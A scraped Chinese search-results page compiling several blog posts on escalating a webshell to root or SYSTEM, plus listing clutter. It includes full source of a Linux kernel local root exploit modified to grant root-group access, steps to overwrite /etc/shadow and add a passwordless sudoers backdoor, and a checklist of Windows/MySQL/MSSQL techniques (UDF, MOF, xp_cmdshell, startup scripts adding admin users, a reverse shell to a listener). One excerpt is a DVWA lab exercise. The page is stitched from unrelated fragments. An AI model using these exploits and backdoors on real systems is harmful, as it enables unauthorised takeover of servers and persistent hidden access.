精华内容
下载资源
问答
  • linux提权 Root权限WebShell提权
    2021-05-18 13:36:09

    没啥技术含量,一种思绪,让某些得到Root权限WebShell的同窗能够快点拿到权限。

    某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat顺序是Root身份启动的,WebShell当然也拥有Root权限。

    详细提权思绪:

    1.WebShell直接替换Root密码:/etc/shadow    //记得备份

    2.准许Root议决ssh登陆:

    修正:/etc/ssh/sshd_config

    PermitRootLogin yes   #准许Root登陆

    3.重启ssh服务:service ssh restart

    4.以Root身份登陆ssh,添加一个用户:

    useradd application

    passwd    //依据提示配置密码

    5.修改application用户运转su不需密码:

    chmod +w /etc/sudoers    //添加写入权限,默许只读

    修正:/etc/sudoers

    vi /etc/sudoers

    参与:application   ALL=(ALL)        NOPASSWD: ALL

    6.把Root密码修正回原样,制止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。

    7.当然开头还要:chmod -w /etc/sudoers

    Root用户登陆。

    普通用户登陆,su免密码进入Root权限。

    更多相关内容
  • webshell提权教程.doc

    2022-01-08 22:45:25
    webshell提权教程
  • Linux下WEBSHELL提权

    2021-05-13 14:45:21
    用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。... 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行...

    用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。

    前提:1、目标机上安装了GCC能编译源码

    2、Kernel 2.6.x         (>= 2.6.13 && < 2.6.17.4)

    因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限.

    /**********溢出代码**************************/

    /* Local r00t Exploit for:                                 */

    /* Linux Kernel PRCTL Core Dump Handling                   */

    /* ( BID 18874 / CVE-2006-2451 )                           */

    /* Kernel 2.6.x        (>= 2.6.13 && < 2.6.17.4)                 */

    /* By:                                                     */

    /* - dreyer                   (main PoC code)         */

    /* - RoMaNSoFt (local root code) */

    /*                                        [ 10.Jul.2006 ]        */

    /*****************************************************/

    #include

    #include

    #include

    #include

    #include

    #include

    #include

    #include

    char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * *         root         cp /bin/sh /tmp/sh ;

    gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";

    int main() {

    int child;

    struct rlimit corelimit;

    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");

    printf("By: dreyer & RoMaNSoFt\n");

    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;

    corelimit.rlim_max = RLIM_INFINITY;

    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {

    chdir("/etc/cron.d");

    prctl(PR_SET_DUMPABLE, 2);

    sleep(200);

    exit(1);

    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **)\n");

    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");

    system("/tmp/sh -p");

    }

    把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp(有时候需要执行几次才能成功).

    用whoami命令看下你会发现你的WEBSHELL权限是ROOT.

    char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~

    展开全文
  • webshell提权

    千次阅读 2018-09-11 22:45:25
    提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 ...

    提权

    提权前奏

    • 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限
    • 通常所处的权限: 
      • ASP/PHP 匿名权限
      • ASPX USER权限
      • JSP 通常是系统权限
    • 收集信息: 
      • 内外网
      • 服务器系统和版本位数
      • 服务器的补丁情况
      • 服务器的安装软件情况
      • 服务器的防护软件情况
      • 端口情况
      • 支持脚本情况
      • 。。。。。。
    • 信息收集常用命令 
      • windows:
      • ipconfig /all:查看当前ip
      • net user:查看当前服务器账号情况
      • netstat -ano:查看服务器端口开启情况
      • ver:查看当前服务器操作系统
      • systeminfo:查看当前服务器配置情况(补丁情况)
      • tasklist -PID pid号:结束某个pid号的进程
      • taskkill /im qq.exe /f:结束QQ进程
      • net user x 123123 /add:添加一个名为x密码为123123的用户
      • net localgroup administrators x /add:将用户x添加到管理员组
      • whoami:查看当前操作用户(当前权限)
      • linux:
      • ls -al:查看当前目录下的文件和文件夹
      • pwd:查看当前操作路径
      • uname -a:查看当前服务器内核信息
    • cmd无法执行 
      • 原因:
      • 防护软件拦截
      • cmd被降级
      • 组件被删除
      • 办法:找可读写目录上传cmd.exe,将执行的cmd.exe路径替换成上传的路径,再次调用执行
    • 查找3389端口 
      • 注册表读取
      • 工具扫描
      • 命令探针

    第三方软件提权

    server -u 提权

    • 有修改权限 
      • 检查是否有可写权限 修改server -u 默认安装目录下的ServUDaemon.ini
      • 增加用户
      • 连接
      • 执行命令:
      • quote site exec net user x 123123 /add
      • quote site exec net localgroup administrators x /add
    • 无修改权 
      • 暴力破解md5
    • 溢出提权

    pcanywhere提权

    • 访问pcanywhere默认安装目录
    • 下载用户配置文件
    • 通过破解账户密码文件

    Radmin提权

    • 通过端口扫描,扫面4899端口
    • 上传radmin.asp木马读取radmin的加密密文
    • 使用工具连接

    VNC提权

    • 通过读取注册表十进制数
    • 将得出的十进制数去掉第一个数,其他的转换成十六进制数
    • 破解十六进制数得到密码
    • vnc4.exe -W 回车
    • 输入转换后的十六进制数
    • 连接VNC

    g6ftp提权

    • 下载管理配置文件,将administrar管理密码破解
    • 使用lcx端口转发(默认只允许本机连接)
    • lcx.exe -tran 8027 127.0.0.1 8021
    • 使用客户端以管理员用户登录
    • 创建用户并设置权限和执行的批处理文件
    • 上传批处理
    • 以创建的普通用户登录ftp
    • 执行命令 quote site x.bat
    • x.bat 内容为添加系统用户,提权

    破解hash提权

    • 上传pwdump.exe 运行获取hash值
    • 拿到lc5、彩虹表中破解,即可得到管理员密码

    360本地提权(09年)

    • 上传cmd.exe和360.exe
    • 运行360.exe
    • 生成五次shift后门

    flashfxp提权

    • 下载quick.dat文件
    • 覆盖替换到本地
    • 获取网站管理密码

    FileZilla提权

    • filezilla是一款开源的FTP服务器和客户端的软件
    • 若安装了服务器端默认只侦听127.0.0.1的14147端口
    • 并且默认安装目录目录下有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息)
    • 提权思路: 
      • 下载这两个文件拿到管理密码
      • 配置端口转发,登录远程管理ftpserve。创建ftp用户
      • 分配权限,设置家目录为C:\
      • 使用cmd.exe改名为sethc.exe,替换c:\windows\system32\sethc.exe生成shift后门
      • 连接3389按5次shift调出cmd.exe

    搜狗输入法提权

    • 找到搜狗输入法安装目录,上传组件
    • 覆盖搜狗输入法调用的组件
    • 当管理员使用搜狗输入法时,组件被调用,账号创建完成

    pr提权

    • 上传pr.exe
    • 运行
    • pr.exe “net user”

    巴西烤肉提权

    • 与pr一样

    启动项提权

    • 前提写入的目录需要写入权限
    • 将批处理文件上传到开机启动项目录,等待管理员重启

    数据库提权

    MSSQL提权

    • 步骤 
      • 安装组件
      • 开启3389
      • 创建用户
      • 提升权限
    • 安装cmd_shell组件 
      • EXEC sp_configure ‘show advance options’,1
      • GO
      • RECONFIGURE
      • GO
      • EXEC sp_configure ‘xp_cmdshell’,0
      • GO
      • RECONFIGURE
      • GO

    MySQL数据库提权

    UDF提权

    • 原理:通过root权限导出duf.dll到系统目录下,可以通过udf.dll调用执行cmd

    • 获取对方的mysql数据库下的root账号密码:

      • 查看网站源码里面的数据库配置文件(inc,conn,config,sql,common,data等)
      • 查看数据库安装路径下的user.myd(/data/mysql)
      • 暴力破解 mysql密码破解 3306端口入侵
    • 导出duf.dll

      • C:\Winnt\udf.dll 2000
      • C:\Windows\udf.dll 2003
      • 5.1以上版本需要导出到mysql安装目录lib\plugin\
      • create function cmdshell returns string soname ‘udf.dll’
      • select cmdshell(‘net user x 123123 /add’);
      • select cmdshell(‘net localgroup administrators x /add’);
      • drop function cmdshell; 删除函数

    启动项提权

    • 拿到root权限

    • 查看数据库中有什么表 show tables;

    • 在TEST数据库中建立一个新表 create table a (cmd text);
    • 在表中插入内容: 
      • insert into a values ("set wshshell=createobject(""wscript.shell"")");
      • insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0)");
      • insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0)");
      • 这三条命令会建立一个VBS的脚本程序
    • 查看表a内容 ·select * from a
    • 表a中确定是插入的三条数据后,输出表为一个VBS的脚本文件 `select * from a into outfile “c://docume~1//administrator//开始菜单//程序//启动//a.vbs”;
    • 重启

    MOF提权

    • 第一种方法: 
      • 上传mof.php。输入相关信息,执行命令,完成提权
    • 第二种方法: 
      • 上传文件x.mof
      • 使用select命令导出到正确位置 select load_file(C:/wmpub/nullevt.mof) into dumpfile "C:/windows/system32/wbem/mof/nullevt.mof";
      • 允许外部地址使用root用户连接的sql语句 grant all privileges on *.* to 'root'@'%' identified by 'kdm001' with grant option;

    反弹端口提权

    • 利用mysql客户端工具连接mysql服务器。然后执行下面的操作: 
      • mysql.exe -h ip -uroot -p
      • enter password
      • mysql>\.c:\mysql.txt;
      • mysql>select backshell("IP",2010);
      • 本地监听你反弹的端口 nc.exe -vv -i -p 2010
      • 成功后,将获得一个system权限的cmdshell。

    linux溢出提权

    linux提权

    • uname -r 查看系统内核版本
    • 找到对应的内核版本的exp
    • 上传–>编译–>运行

    3389

    开启3389

    • 使用 
      • 批处理开3389
      • 使用sql语句开3389
      • 使用exe开3389
      • 使用VB开3389

    嗅探3389和http登陆的密码

    • wireshark
    • cain
    展开全文
  • webshell提权教程

    2014-07-04 01:41:52
    webshell提权教程
  • 基于Mysql的webshell提权【实验目的】通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。【实验环境】攻击机:Win2008-att用户名college,密码360College...

    基于Mysql的webshell提权

    【实验目的】

    通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。

    【实验环境】

    攻击机:Win2008-att

    用户名college,密码360College

    使用的webshell文件:dama.php

    目标靶机:Win2003-DVWA

    用户名college,密码360College

    【实验步骤】

    1.在靶机Win2003-DVWA上,启动phpstudy,开启漏洞环境。

    980fbebf3a4fbd13b5f708f2b75adf67.png

    2.在攻击机上,启动Firefox浏览器,登录靶机上的DVWA网站。

    网站的URL为:http://【靶机IP地址】/dvwa

    登录用户名为admin,密码为password

    76f1d0e1b8d08779d1c886b15ece9156.png

    3.成功登录DVWA网站后,选择网站左侧菜单“DVWA Security”,将DVWA网站安全等级设置为“Low”。

    d99e02aed5e5edecbb614bb7381fe672.png

    4.选择网站左侧菜单“File Upload”,将攻击机Win2008-att桌面文件夹Tools中的dama.php(实验中所用的webshell)上传至靶机。

    d97e7924273f28c3c0a946e73f78e8b9.png

    5.dama.php上传成功后,在攻击机浏览的地址栏中输入如下URL连接dama.php:

    http://【靶机IP地址】/dvwa/hackable/uploads/dama.php

    16176db13fa97988fdcd30a65e5ee507.png

    出现登录提示框时,输入密码hucyuansheng登录。

    6.成功登录dama.php后,选择左侧菜单“提权工具”->“MySQL操作”,输入MySQL数据库的登录密码root,以root用户权限登录。

    05abd2ab59590592ed0f2a0811570a0c.png

    7.选择数据库test,并执行如下操作:

    a2fa4440f55f85303c207824dd4f0004.png

    (1)利用如下命令在test下创建一个新的表a:

    create table a(cmd text);

    该数据表表名为a,表中只存放一个字段,字段名为cmd,为text文本。

    (2)利用如下命令在表a中插入内容:

    insert into a values("set wshshell=createobject (""wscript.shell"")");

    insert into a values("a=wshshell.run(""cmd.exe /c net user 1 1 /add"",0)");

    insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators 1 /add"",0)");

    注意双引号和括号以及后面的"0"一定要输入!将用这三条命令来建立一个vbs脚本程序!后面的"0"表示不弹出CMD窗口,安静地运行。

    上述三条命令执行成功后,可以看到如下图所示的结果,表a中已保存了相应的内容。也可以通过执行如下命令查看表a中的内容:

    select * from a;

    994430947952820c26fbb5b284ff541e.png

    (3)利用如下命令创建一个vbs脚本程序,并将其输出至靶机操作系统的开始启动项中:

    select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

    77bfe49f53def8be7f88cb78650f5acc.png

    8.在靶机上验证攻击效果。

    (1)点击“开始”菜单->“启动”,会发现启动项中有一个a.vbs的脚本程序;

    043950ec3afc972acad82df58d8351c5.png

    (2)重启靶机后,在cmd下输入net user命令,会看到靶机操作系统中被添加了一个用户“1”。

    d8945141401dbe4e7fd44796770f8f57.png

    实验至此结束。

    思考与总结

    通过本次实验成功实现了基于webshell执行mysql命令来写入一个自启动功能的vbs脚本,掌握了基于webshell进行提权的方法,能够结合操作系统安全策略,配置数据库和操作系统的各项访问权限。

    标签:webshell,php,DVWA,提权,Mysql,靶机,dama

    来源: https://www.cnblogs.com/miansj/p/13996089.html

    展开全文
  • 虚拟主机封杀webshell提权!!!!!!!!!!
  • Linux下WEBSHELL提权一技

    2014-06-15 18:49:07
    Linux下WEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
  • webshell 提权

    2019-05-09 11:12:21
    服务器教程-webshell 提权方法 服务器提权教程 webshell提权拿服务器方法总结 - xysoul的专栏 - CSDN博客 最全面的 webshell 提权资料之一 - 颓废's Blog
  • 常用webshell提权方法

    千次阅读 2018-02-28 23:17:31
    pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则...
  • Microsoft Windows中存在提权漏洞,该漏洞源于Win32k组件没有正确的处理内存中的对象。攻击者可利用该漏洞在内核模式下以提升的权限执行任意代码。 2 漏洞标识符 CVE ID: CVE-2018-8120 3 影响系统 受影响系统:...
  • webshell提权工具

    2011-10-25 20:58:48
    内有各种提权工具 支持webshell 巴西烤肉 NC LCX PR等等
  • WEBSHELL提权方法总结

    2013-02-24 16:38:52
    WEBSHELL提权方法总结,大家可以看一下,不明白QQ我
  • webSHELL提权

    2011-09-11 17:56:37
    SHELL提权 今天给大家带来一个 webshell提权教程
  • webshell提权工具工具

    2010-11-26 15:59:33
    web提权工具,一个好用的serv-u目录查看工具,哈哈哈哈哈哈哈哈
  • 最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看
  •  c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell  #!/usr/bin/perl  binmode(STDOUT);  syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);  $_ = $ENV{...
  • 海盗webshell提权工具包 详细介绍:海盗webshell提权工具包 包含了常用的各类提权工具 轻松应付提权难题
  • 基于webshell提权

    千次阅读 2017-08-18 15:32:14
    1.Server-u提权 通过webshell读取server-u配置文件,修改配置,添加系统用户 1,利用webshell读取服务器信息,发现服务器系统安装server-u服务,默认端口号43958 2.创建用户账户:cmd /c ...
  • webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后...
  • WEBSHELL 提权方法总结

    千次阅读 2017-04-19 19:42:14
    WEBSHELL 提权方法总结 在得到了一个 Webshell 之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津 津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权...
  • 无心webshell提权工具包最终版无心webshell提权工具包最终版
  • Webshell的Windows提权

    2021-10-29 15:55:49
    本文仅提供于学术探讨,如有后果自行承担。 Webshell的Windows提权 内网搭建
  • webshell提权拿服务器方法总结

    万次阅读 2015-03-20 14:12:25
    今天有朋友希望更新一些关于提权的一些文章,加上小残今天有时间所以在这里为大家讲解下本人的一般拿到webshell提权思路把。 1.我相信很多朋友刚拿到webshell以后都会尝试是否能执行CMD命令,如果可以执行...
  • 无心webshell提权工具包,简单实用,易上手~~~~~~~~~~~~~!
  • webshell最新内核提权工具 用法很简单 就是 xx.exe “命令” 比巴西烤肉和pr要好用很多 很多都能提权
  • 方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]... test这个文件baidu貌似木有上传功能撒,木办法传 貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 5,310
精华内容 2,124
关键字:

webshell提权